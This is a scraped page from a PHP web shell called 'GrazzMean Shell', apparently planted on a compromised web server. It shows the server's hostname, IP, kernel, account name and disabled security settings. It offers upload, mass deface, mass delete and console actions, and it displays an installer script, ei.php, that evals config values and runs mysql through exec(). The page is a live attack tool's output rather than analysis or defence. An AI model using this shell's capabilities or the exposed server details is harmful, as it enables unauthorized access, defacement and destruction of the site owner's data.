shell bypass 403

GrazzMean Shell

: /usr/local/ei/old/ [ drwxr-xr-x ]
Uname: Linux web3.us.cloudlogin.co 5.10.226-xeon-hst #2 SMP Fri Sep 13 12:28:44 UTC 2024 x86_64
Software: Apache
PHP version: 8.1.31 [ PHP INFO ] PHP os: Linux
Server Ip: 162.210.96.117
Your Ip: 3.144.243.30
User: edustar (269686) | Group: tty (888)
Safe Mode: OFF
Disable Function:
NONE
upload mass deface mass delete console

name : ei.php 
<?php
define('CONFIG_FILE', 'ei_config.php');
define('MYSQL_CONFIG', 'ei_my.cnf');

if (!($config = file_get_contents(CONFIG_FILE)))
	exit("Can't read " . CONFIG_FILES . "\n");

if (!($config = json_decode($config, true)))
	exit("Can't decode " . CONFIG_FILE . "\n");

$prefix = $config['prefix'];
$suffix = $config['suffix'];
$params = $config['params'];
$db = $config['sql'];

foreach ($config['files'] as $file) {
	replace_params($file, $prefix, $suffix, $params, $db);
}

if (!empty($config['sql'])) {
	$database = $config['sql']['dbname'];
	$username = $config['sql']['dbuser'];
	$password = $config['sql']['dbpass'];
	file_put_contents(MYSQL_CONFIG, <<<MYSQL
[client]
user=$username
password=$password
MYSQL);
	foreach ($config['sql']['files'] as $sql_file) {
		replace_params($sql_file, $prefix, $suffix, $params, $db);


		$cmd = sprintf("mysql --defaults-file=%s %s < %s 2>&1", MYSQL_CONFIG, $database, $sql_file);
		$output = [];
		$ret = 0;
		exec($cmd, $output, $ret);

		if ($ret !== 0) {
			echo "mysql dump insert failure\n";
		} else {
			//unlink(MYSQL_CONFIG);
			//unlink($sql_file);
		}
	}
}

//unlink(CONFIG_FILE);

function replace_params($file, $prefix, $suffix, $params, $db) {
	$file = './' . $file;
	echo "replacing $file\n";
	if (!($content = file_get_contents($file))) {
		echo "Can't read $file\n";
		return false;
	}

	$vars = [];

	foreach ($db as $k => $v) { // db details
		if (is_string($v))
			$params[$k] = ['value' => $v];
	}

	//print_r($params);
	//replace vars in vars
	foreach ($params as $k1 => $v1) {
		foreach ($params as $k2 => $v2) {
			$params[$k2]['value'] = str_replace($prefix . $k1 . $suffix, $v1['value'], $params[$k2]['value']);
		}
	}

	//print_r($params);
	//calculate values
	foreach ($params as $k => $v) {
		$vars[$k] = escape(@$v['escape'], param($k, $v));
	}

	//print_r($vars);

	foreach ($vars as $k => $v)
		$content = str_replace($prefix . $k . $suffix, $v, $content);

	file_put_contents($file, $content);
}

function param($k, $v) {
	$options = !empty($v['options']) ? $v['options'] : [];
	$ret = $v['value'];
	foreach ($options as $option) {
		switch ($option) {
			case 'eval':
				$ret = eval($ret);
				break;
			case 'md5':
				$ret = md5($v['value']);
				break;
			//case 'hidden':
			//default:
			//	$ret = $v['value'];
		}
	}

	return $ret;
}

function escape_single_quotes($value) {
	return addcslashes($value, "'");
}

function escape_double_quotes($value) {
	return addcslashes($value, '"');
}

function escape($func, $value) {
	return $func ? $func($value) : $value;
}
© 2025 GrazzMean